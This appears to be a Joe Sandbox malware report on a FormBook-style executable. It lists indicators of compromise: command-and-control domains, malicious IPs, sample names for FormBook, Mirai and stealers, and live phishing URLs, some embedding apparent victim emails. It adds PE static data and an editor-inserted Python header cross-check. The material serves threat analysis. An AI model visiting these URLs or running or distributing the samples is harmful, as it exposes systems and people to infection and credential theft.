Time | Type | Description
23:56:31 | API Interceptor | 10851459x Sleep call for process: rasdial.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
162.0.238.246 | ekte.exe | malicious | FormBook | www.guldeu.xyz/qd68/
162.0.238.246 | EKTEDIR.exe | malicious | FormBook | www.guldeu.xyz/qd68/
162.0.238.246 | lByv6mqTCJ.exe | malicious | FormBook | www.jophy.life/umni/
162.0.238.246 | Arrival notice.exe | malicious | FormBook | www.kilbmn.xyz/a8og/?EZ2lo=63Tp62CKGmWe748Q5xeLHwHqlS9/zq85FZX5ThSUZXnn1SRB3dZnoH27TzC6blggGQlMUKSAP7YLOcUQh9GTRQVuzTmijcvuIWv8RUIdN7d1j+xO0w==&7NP=7FXXUPl
162.0.238.246 | DHL_ 46773482.exe | malicious | FormBook | www.buyiop.online/r6mm/
162.0.238.246 | z4Shipping_document_pdf.exe | malicious | FormBook | www.huyven.xyz/dbbh/
162.0.238.246 | Purchase Order_ AEPL-2324-1126.exe | malicious | FormBook | www.mistsui.top/r48b/
162.0.238.246 | RECIEPT.PDF.exe | malicious | FormBook | www.quantis.life/hczh/
162.0.238.246 | LgzpILNkS2.exe | malicious | FormBook | www.inchey.online/ercr/
136.143.186.12 | jeez.exe | malicious | FormBook | www.lanxuanz.tech/m8yb/
136.143.186.12 | PURCHASE ORDER.exe | malicious | FormBook | www.lanxuanz.tech/ivo1/
136.143.186.12 | z4Shipping_document_pdf.exe | malicious | FormBook | www.lanxuanz.tech/1q08/
136.143.186.12 | NVOICE FOR THE MONTH OF AUG-24.exe | malicious | FormBook | www.lanxuanz.tech/ivo1/
136.143.186.12 | DEBIT NOTE 01ST SEP 2024.exe | malicious | FormBook | www.lanxuanz.tech/ivo1/
136.143.186.12 | PROFOMA INVOICE SHEET.exe | malicious | FormBook | www.lanxuanz.tech/ivo1/
136.143.186.12 | x.exe | malicious | FormBook | www.lanxuanz.tech/em49/
136.143.186.12 | bin.exe | malicious | FormBook | www.lanxuanz.tech/em49/
136.143.186.12 | PR44238-43433.exe | malicious | FormBook | www.jrksa.info/nq8t/
136.143.186.12 | w3xlXm0r8W.exe | malicious | FormBook | www.novaminds.online/ephb/?xN6PGj=vLmbgoHRNfK6ITOjmiLFGNRbChMUzx7XLdCca8olfY2Nxc16AQQbup47Ltpv+Aaivc7Y&_0DPe6=UHL0NdrXCvl
197.189.237.186 | foljNJ4bug.exe | malicious | FormBook | www.patioprojex.africa/x557/
197.189.237.186 | z4Shipping_document_pdf.exe | malicious | FormBook | www.patioprojex.africa/iv79/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.huyven.xyz | z4Shipping_document_pdf.exe | malicious | FormBook | 162.0.238.246
www.ngmr.xyz | rHSBCBank_Paymentswiftcpy.exe | malicious | FormBook | 54.67.87.110
www.ngmr.xyz | jeez.exe | malicious | FormBook | 54.67.87.110
www.ngmr.xyz | -pdf.bat.exe | malicious | FormBook | 54.67.87.110
www.ngmr.xyz | z4Shipping_document_pdf.exe | malicious | FormBook | 54.67.87.110
www.ngmr.xyz | UMOWA_PD.BAT.exe | malicious | FormBook, GuLoader | 54.67.87.110
zhs.zohosites.com | jeez.exe | malicious | FormBook | 136.143.186.12
zhs.zohosites.com | PURCHASE ORDER.exe | malicious | FormBook | 136.143.186.12
zhs.zohosites.com | z4Shipping_document_pdf.exe | malicious | FormBook | 136.143.186.12
zhs.zohosites.com | NVOICE FOR THE MONTH OF AUG-24.exe | malicious | FormBook | 136.143.186.12
zhs.zohosites.com | DEBIT NOTE 01ST SEP 2024.exe | malicious | FormBook | 136.143.186.12
zhs.zohosites.com | PROFOMA INVOICE SHEET.exe | malicious | FormBook | 136.143.186.12
zhs.zohosites.com | x.exe | malicious | FormBook | 136.143.186.12
zhs.zohosites.com | bin.exe | malicious | FormBook | 136.143.186.12
zhs.zohosites.com | PR44238-43433.exe | malicious | FormBook | 136.143.186.12
zhs.zohosites.com | w3xlXm0r8W.exe | malicious | FormBook | 136.143.186.12
www.fieldelse.net | z4Shipping_document_pdf.exe | malicious | FormBook | 18.141.10.107
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.97.3
CLOUDFLARENETUS | file.exe | malicious | Stealc, Vidar | 172.64.41.3
CLOUDFLARENETUS | z1MRforsteamDRUM-A1_pdf.exe | malicious | PureLog Stealer, Snake Keylogger | 188.114.97.3
CLOUDFLARENETUS | https://eot.lps-china.com/f/a/pQ-JA2nitAQtMB92xwUcGg~~/AAAHUQA~/RgRpAabzP4QTAWh0dHBzOi8vYmVyZW5pY2UuZW9tYWlsOC5jb20vdW5zdWJzY3JpYmU_ZXA9MiZsPTVlNmE0MDU2LWVhZTMtMTFlZS1hNzNjLWM1NDU2ZDI0OGQ3OCZsYz0zMmVlMmQ3Yy0zMjA4LTExZWYtYTFiZS1lYjMwYzAwY2FlZDgmcD05NDM1NjNkYy05Mzc2LTExZWYtYTdkMi00NTk0MDQ5OWMzNTYmcHQ9Y2FtcGFpZ24mcHY9NCZzcGE9MTczMDA5MzQ0NCZ0PTE3MzAwOTM1NTUmcz1mNWE2NDYwZWE1NTFlYzYxZDFiNjJhZTBhNTI2NGFhNjdmYWMxN2I1MzRkNWI4MzdhNTA0MDAwM2ZhNmZmMGUwVwVzcGNldUIKZw7zIR9n2KUgilIeZ2VtbWEubG9yZW56b0BkdWJhaWhvbGRpbmcuY29tWAQAAAL5 | malicious | Unknown | 172.67.132.160
CLOUDFLARENETUS | Uviv7rEtnt.exe | malicious | Stealc, Vidar | 172.67.179.207
CLOUDFLARENETUS | file.exe | malicious | LummaC | 188.114.96.3
CLOUDFLARENETUS | https://www.google.im/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s/creditodigitalelmo.com.br/solo/i2975ufuy18zkhauvhibzzxy/YWRzQGJldHdlZW4udXM= | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | z6INVOICE.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3
CLOUDFLARENETUS | https://alcatrazpackages.com/elchapo.html | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | file.exe | malicious | LummaC | 188.114.97.3
xneeloZA | garm.elf | malicious | Mirai | 197.221.56.217
xneeloZA | mpsl.elf | malicious | Mirai | 197.221.56.203
xneeloZA | pmpsl.elf | malicious | Mirai | 41.203.15.86
xneeloZA | jklx86.elf | malicious | Unknown | 129.232.189.148
xneeloZA | mpsl.elf | malicious | Mirai, Moobot | 41.203.27.60
xneeloZA | gppc.elf | malicious | Mirai | 197.221.56.219
xneeloZA | nshsh4.elf | malicious | Mirai | 41.203.15.90
xneeloZA | garm7.elf | malicious | Mirai | 197.221.56.218
xneeloZA | x86_64.elf | malicious | Mirai | 197.221.56.205
xneeloZA | na.elf | malicious | Mirai, Gafgyt | 156.38.239.160
NAMECHEAP-NETUS | http://demettei.com | malicious | Unknown | 198.54.117.242
NAMECHEAP-NETUS | https://fce0.com/vn%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/ | malicious | HTMLPhisher, Mamba2FA | 199.188.200.231
NAMECHEAP-NETUS | https://kljhgfdertg7h8uihfgdew34e5rtyuhjiolkjhgfd.pages.dev/?zOTAyMn0.o1hC1xYbJolS=test@kghm.com&h0-bOY230w22zEQSk5Ti | malicious | HTMLPhisher | 104.219.248.26
NAMECHEAP-NETUS | la.bot.mipsel.elf | malicious | Unknown | 192.64.119.187
NAMECHEAP-NETUS | 7950COPY.exe | malicious | FormBook | 68.65.123.56
NAMECHEAP-NETUS | 1.zip | malicious | Unknown | 198.54.117.242
NAMECHEAP-NETUS | https://www.google.ca/url?q=nyYhuJkyZc5becm4Aebd&rct=dHYJbECHyHBgmK2d6Hkk&sa=t&esrc=VPIIRnP5TJCWQChPCgwH&source=&cd=TWsylIzvnNqdQKP0bZIw&uact=&url=amp/uniquestarsent.com/ck/bd/BNsT048mrEEHImhtrfrgmcfu/a2Vubml0aC5jYXNlQGFkdmFuY2UtYXV0by5jb20 | malicious | HTMLPhisher | 198.54.115.49
NAMECHEAP-NETUS | PO 45003516.exe | malicious | FormBook | 162.0.225.218
NAMECHEAP-NETUS | la.bot.arm5.elf | malicious | Mirai | 198.187.31.61
NAMECHEAP-NETUS | New orde.exe | malicious | FormBook | 198.54.125.199
ZOHO-ASUS | https://workdrive.zohoexternal.com/file/d3qaw4673940b54374623b165953068c580b5 | malicious | HTMLPhisher | 136.143.191.16
ZOHO-ASUS | la.bot.powerpc.elf | malicious | Unknown | 165.173.254.237
ZOHO-ASUS | https://www.pumpproducts.com/goulds-lb0735te-centrifugal-booster-pump-3-4-hp-208-230-460-volts-3-phase-1-1-4-npt-suction-1-npt-discharge-18-gpm-max-176-ft-max-head-5-impeller-tefc-stainless-steel-pump-end-casing.html | malicious | Unknown | 136.143.190.172
ZOHO-ASUS | https://www.google.hn/url?q=//www.google.ee/amp/s/h2f35e7.ubpages.com/bdeda8-f4eb-4ed8-b | malicious | HTMLPhisher | 136.143.190.123
ZOHO-ASUS | https://forms.zohopublic.com/infracon/form/Admin365/formperma/soOC4wKkJUgax5Rc4KZNGEn7_-YDqfLh02-40-_JjCE | malicious | Unknown | 136.143.182.97
ZOHO-ASUS | https://forms.zohopublic.com/infracon/form/Admin365/formperma/soOC4wKkJUgax5Rc4KZNGEn7_-YDqfLh02-40-_JjCE | malicious | Unknown | 136.143.182.97
ZOHO-ASUS | https://u47624652.ct.sendgrid.net/ls/click?upn=u001.dadsJCAJAl1i2Wyni-2FqIpB7JUgY2pex5g8M-2FhOTGFFHwo5sWgFDjcqy2L0OmonoaOFxcTz7SSB9Zef6mGbvSbZAXZK2FNhcmYdYC1XfrewJRXTzEzFwzmIj8nJoazHaAQVwyvlny49OkXm-2FDzbhWD3cqi52XZmuHNJ5erV06gLBXVvtoQCYY0OMkrHePY-2F9kOmRiOc8fRxBlNxNWWJDbU4O9z5P8IfXhDPiFYyln4kg-3DMEyt_ta3c1LGL-2F0rVfKZ7mVrwN6xsF1Wes8l2L7kiutKf8O1vhXHOMQAk657ifMzrLT5hR0wjO0bDDWiSyPYBMWem2YqbQ4hjbtaf8R6UfuK7GvGuvaOArNf0yRKKyAsKfoVrlXUbmkgYGBk7NXAN8n11wXOM8RDTicUs3dK12Mnhp63jlPtSTpECLklTQMdoXlI5m8IncC-2BD2wJgWDFrBq8JEg-3D-3D | malicious | HTMLPhisher | 204.141.42.123
ZOHO-ASUS | https://forms.zohopublic.com/pharmops1/form/DOCUSIGNREVIEW/formperma/hzyn6gH_uB4k6Kv8lque19zZem5KI3as5uJYGnlnfac | malicious | HTMLPhisher | 136.143.182.97
ZOHO-ASUS | jeez.exe | malicious | FormBook | 136.143.186.12
ZOHO-ASUS | https://forms.zohopublic.com/pharmops1/form/DOCUSIGNREVIEW/formperma/hzyn6gH_uB4k6Kv8lque19zZem5KI3as5uJYGnlnfac | malicious | HTMLPhisher | 136.143.182.97
                                                                    No context
                                                                    No context
                                                                    Process:C:\Windows\SysWOW64\rasdial.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Reputation:high, very likely benign file
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\Purchase_Order_pdf.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):287232
                                                                    Entropy (8bit):7.995508300983733
                                                                    Encrypted:true
                                                                    SSDEEP:6144:PQkBOXLRwGy5TBvjEqFJ8LqltNdx5/XOSbdOAZo10lSHUGsishj0CqO+:foRHGhL8gtB5/XOuo+YHUT41/
                                                                    MD5:B9F10BE763961C984F828376CE2A38D6
                                                                    SHA1:DF586382A2B4673AE500AD1AF5059FE80B9F2449
                                                                    SHA-256:C95BF4CFD70EF462D80140CA922976ACCA0E54162F3C28C9E3DD6F3709E39C88
                                                                    SHA-512:5ED5B2F5CF14E391C85553466AE8A80500BBFCC4979771278123BC71B27E64C58B0252A6B9F97E062B9FA192E797915C44135FA91E587FD6E2218CF5C0E06A86
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:|..k.NW5F...Y..}.I2...mM_..7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI.GL9KQ.;F.>.q.M..`.!X4lI7!0G';. 1!";2a*,.59We'9...dc= (1hLEC.GL9ENW5?W>.m/+.{!/..'+._...|6P.J..z!/.+...y.0..?T+m/+.FAHI1GL9..W5.W6C....FAHI1GL9.NU4MW<CP.HTFAHI1GL9.]W5FF7CP/HTFA.I1WL9ELW5@V7CPOLT@AHI1GL9E.S5FT7CPOLTDA..1G\9E^W5FV'CP_LTFAHI!GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7C~;),2AHI..H9E^W5F.3CP_LTFAHI1GL9ENW5fV7#POLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI1GL9ENW5FV7CPOLTFAHI
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.511573675079194
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                    • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:Purchase_Order_pdf.exe
                                                                    File size:1'327'231 bytes
                                                                    MD5:0e51b97a594aa2f1756261a47a695484
                                                                    SHA1:0c2d719650e6a5bab5a3616c357eb20f6bb6cb6d
                                                                    SHA256:03489fbf1f559b8f7e7c6a0dec74826233e3c79ca34bdf06f9617f269b68ff54
                                                                    SHA512:76f6d96ff362f5e222e22d4e1e37e9ed5f02854b23976b07511a63100e71660e14c0ff4a57d85fa61ea67de45e93c0b56c2198addd2890b3f80ebbaaf9634f67
                                                                    SSDEEP:24576:ffmMv6Ckr7Mny5QLqpuW+7ZQcCHdGYRnDVrTWGii:f3v+7/5QLqpbfcehDV1ii
                                                                    TLSH:E455F112F7D680B6DDA33971297BE327DB3576194323C5CB97E02E768E211109B3A362
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........
                                                                    Icon Hash:1733312925935517
                                                                    Entrypoint:0x416310
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:0
                                                                    File Version Major:5
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:aaaa8913c89c8aa4a5d93f06853894da
                                                                    Instruction
                                                                    call 00007FB6FD0BCEFCh
                                                                    jmp 00007FB6FD0B0CCEh
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push edi
                                                                    push esi
                                                                    mov esi, dword ptr [ebp+0Ch]
                                                                    mov ecx, dword ptr [ebp+10h]
                                                                    mov edi, dword ptr [ebp+08h]
                                                                    mov eax, ecx
                                                                    mov edx, ecx
                                                                    add eax, esi
                                                                    cmp edi, esi
                                                                    jbe 00007FB6FD0B0E5Ah
                                                                    cmp edi, eax
                                                                    jc 00007FB6FD0B0FFAh
                                                                    cmp ecx, 00000100h
                                                                    jc 00007FB6FD0B0E71h
                                                                    cmp dword ptr [004A94E0h], 00000000h
                                                                    je 00007FB6FD0B0E68h
                                                                    push edi
                                                                    push esi
                                                                    and edi, 0Fh
                                                                    and esi, 0Fh
                                                                    cmp edi, esi
                                                                    pop esi
                                                                    pop edi
                                                                    jne 00007FB6FD0B0E5Ah
                                                                    pop esi
                                                                    pop edi
                                                                    pop ebp
                                                                    jmp 00007FB6FD0B12BAh
                                                                    test edi, 00000003h
                                                                    jne 00007FB6FD0B0E67h
                                                                    shr ecx, 02h
                                                                    and edx, 03h
                                                                    cmp ecx, 08h
                                                                    jc 00007FB6FD0B0E7Ch
                                                                    rep movsd
                                                                    jmp dword ptr [00416494h+edx*4]
                                                                    nop
                                                                    mov eax, edi
                                                                    mov edx, 00000003h
                                                                    sub ecx, 04h
                                                                    jc 00007FB6FD0B0E5Eh
                                                                    and eax, 03h
                                                                    add ecx, eax
                                                                    jmp dword ptr [004163A8h+eax*4]
                                                                    jmp dword ptr [004164A4h+ecx*4]
                                                                    nop
                                                                    jmp dword ptr [00416428h+ecx*4]
                                                                    nop
                                                                    mov eax, E4004163h
                                                                    arpl word ptr [ecx+00h], ax
                                                                    or byte ptr [ecx+eax*2+00h], ah
                                                                    and edx, ecx
                                                                    mov al, byte ptr [esi]
                                                                    mov byte ptr [edi], al
                                                                    mov al, byte ptr [esi+01h]
                                                                    mov byte ptr [edi+01h], al
                                                                    mov al, byte ptr [esi+02h]
                                                                    shr ecx, 02h
                                                                    mov byte ptr [edi+02h], al
                                                                    add esi, 03h
                                                                    add edi, 03h
                                                                    cmp ecx, 08h
                                                                    jc 00007FB6FD0B0E1Eh
                                                                    Programming Language:
                                                                    • [ASM] VS2008 SP1 build 30729
                                                                    • [ C ] VS2008 SP1 build 30729
                                                                    • [C++] VS2008 SP1 build 30729
                                                                    • [ C ] VS2005 build 50727
                                                                    • [IMP] VS2005 build 50727
                                                                    • [ASM] VS2008 build 21022
                                                                    • [RES] VS2008 build 21022
                                                                    • [LNK] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8cd3c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9298 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x840 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x80017 | 0x80200 | 6c20c6bf686768b6f134f5bd508171bc | False | 0.5602991615853659 | data | 6.634688230255595 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xd95c | 0xda00 | f979966509a93083729d23cdfd2a6f2d | False | 0.36256450688073394 | data | 4.880040824124099 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a518 | 0x6800 | e5d77411f751d28c6eee48a743606795 | False | 0.1600060096153846 | data | 2.2017649896261107 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9298 | 0x9400 | f6be76de0ef2c68f397158bf01bdef3e | False | 0.4896801097972973 | data | 5.530303089784181 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
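The section table and data directories above can be cross-checked against each other and against the header flags listed earlier in the report. The following is an added example, not part of the Joe Sandbox report: it transcribes those values as constants and re-derives the facts a triage analyst wants confirmed before trusting a static report (which section holds the entrypoint, which section each data directory maps into, whether the sections are contiguous and file-aligned, how many DLLs the import directory can hold, and which exploit mitigations the headers opt out of). Section and file alignment of 0x1000 and 0x200 are assumptions, since the report does not print them.

```python
"""Cross-check the PE layout facts in the static report above.

Added example, not part of the Joe Sandbox report: section table, data
directories, entrypoint and header flags are transcribed from the report;
the checks are the editor's own. SECTION_ALIGNMENT / FILE_ALIGNMENT are
assumptions (the report does not print OptionalHeader alignments).
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

IMAGE_BASE = 0x400000
ENTRYPOINT_VA = 0x416310
SECTION_ALIGNMENT = 0x1000  # assumed
FILE_ALIGNMENT = 0x200      # assumed

# winnt.h bit values
IMAGE_FILE_RELOCS_STRIPPED = 0x0001
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100
IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE = 0x8000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
IMPORT_DESCRIPTOR_SIZE = 20  # sizeof(IMAGE_IMPORT_DESCRIPTOR)

# Report: "RELOCS_STRIPPED, EXECUTABLE_IMAGE (0x2), LARGE_ADDRESS_AWARE (0x20), 32BIT_MACHINE (0x100)"
FILE_CHARACTERISTICS = IMAGE_FILE_RELOCS_STRIPPED | 0x0002 | 0x0020 | 0x0100
# Report: "DLL Characteristics: TERMINAL_SERVER_AWARE" and nothing else
DLL_CHARACTERISTICS = IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE


@dataclass(frozen=True)
class Section:
    name: str
    rva: int
    vsize: int
    rawsize: int
    flags: int


# Transcribed from the section table above (MD5 and entropy columns omitted).
SECTIONS: Tuple[Section, ...] = (
    Section(".text",  0x1000,  0x80017, 0x80200, IMAGE_SCN_MEM_EXECUTE),
    Section(".rdata", 0x82000, 0xd95c,  0xda00,  0),
    Section(".data",  0x90000, 0x1a518, 0x6800,  IMAGE_SCN_MEM_WRITE),
    Section(".rsrc",  0xab000, 0x9298,  0x9400,  0),
)
# Non-empty data directories from the table above: name -> (RVA, size).
DATA_DIRECTORIES: Dict[str, Tuple[int, int]] = {
    "IMPORT": (0x8cd3c, 0x154), "RESOURCE": (0xab000, 0x9298), "IAT": (0x82000, 0x840),
}
# DLLs named in this report's import table, in the order listed there.
IMPORTED_DLLS = ("WSOCK32.dll", "VERSION.dll", "WINMM.dll", "COMCTL32.dll", "MPR.dll",
                 "WININET.dll", "PSAPI.DLL", "USERENV.dll", "KERNEL32.dll", "USER32.dll",
                 "GDI32.dll", "COMDLG32.dll", "ADVAPI32.dll", "SHELL32.dll", "ole32.dll",
                 "OLEAUT32.dll")


def align_up(value: int, alignment: int) -> int:
    return (value + alignment - 1) // alignment * alignment


def section_for_rva(rva: int) -> Optional[str]:
    """Section whose mapped range (VirtualSize rounded up to SectionAlignment) contains rva."""
    for s in SECTIONS:
        if s.rva <= rva < s.rva + align_up(s.vsize, SECTION_ALIGNMENT):
            return s.name
    return None


def entrypoint_section() -> Optional[str]:
    return section_for_rva(ENTRYPOINT_VA - IMAGE_BASE)


def directory_sections() -> Dict[str, Optional[str]]:
    """Compare with the report's 'Is in Section' column."""
    return {name: section_for_rva(rva) for name, (rva, _size) in DATA_DIRECTORIES.items()}


def layout_anomalies() -> List[str]:
    """Sections must be contiguous, file-aligned, free of overlay past VirtualSize, and not W+X."""
    findings = []
    for prev, cur in zip(SECTIONS, SECTIONS[1:]):
        expected = align_up(prev.rva + prev.vsize, SECTION_ALIGNMENT)
        if cur.rva != expected:
            findings.append(f"{cur.name} starts at {cur.rva:#x}, expected {expected:#x}")
    for s in SECTIONS:
        if s.rawsize % FILE_ALIGNMENT:
            findings.append(f"{s.name}: raw size {s.rawsize:#x} not file-aligned")
        if s.rawsize > align_up(s.vsize, FILE_ALIGNMENT):
            findings.append(f"{s.name}: raw data extends past its virtual size")
        if s.flags & IMAGE_SCN_MEM_EXECUTE and s.flags & IMAGE_SCN_MEM_WRITE:
            findings.append(f"{s.name}: writable and executable")
    return findings


def import_descriptor_count() -> int:
    """The import directory is one 20-byte descriptor per DLL plus an all-zero terminator."""
    _rva, size = DATA_DIRECTORIES["IMPORT"]
    return size // IMPORT_DESCRIPTOR_SIZE - 1


def missing_mitigations() -> List[str]:
    """Exploit mitigations the headers opt out of."""
    out = []
    if not DLL_CHARACTERISTICS & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE:
        reason = "DYNAMIC_BASE not set"
        if FILE_CHARACTERISTICS & IMAGE_FILE_RELOCS_STRIPPED:
            reason += " and relocations stripped, so the image cannot be rebased"
        out.append(f"ASLR: {reason}; always mapped at {IMAGE_BASE:#x}")
    if not DLL_CHARACTERISTICS & IMAGE_DLLCHARACTERISTICS_NX_COMPAT:
        out.append("DEP: NX_COMPAT not set")
    return out


if __name__ == "__main__":
    print("entrypoint in:", entrypoint_section(), "| directories:", directory_sections())
    print("import descriptors:", import_descriptor_count(), "/ DLLs listed:", len(IMPORTED_DLLS))
    print("layout anomalies:", layout_anomalies() or "none", "| missing:", missing_mitigations())
```

With the report's values every check comes back clean: the entrypoint RVA 0x16310 sits in .text, the import and IAT directories in .rdata and the resource directory in .rsrc exactly as the "Is in Section" column says, the four sections tile the image with no gaps, and the 0x154-byte import directory holds 16 descriptors plus the terminator, one per DLL in the import table. The header flags are the notable part: RELOCS_STRIPPED together with a DLL Characteristics field holding only TERMINAL_SERVER_AWARE means the image is always mapped at 0x400000 and cannot be relocated by ASLR, and without NX_COMPAT it does not opt in to DEP under the default OptIn policy. For a 32-bit runtime stub with a 2010 timestamp that is unsurprising rather than evasive, but it does make any code addresses recovered from one memory dump valid across every infected host.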
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
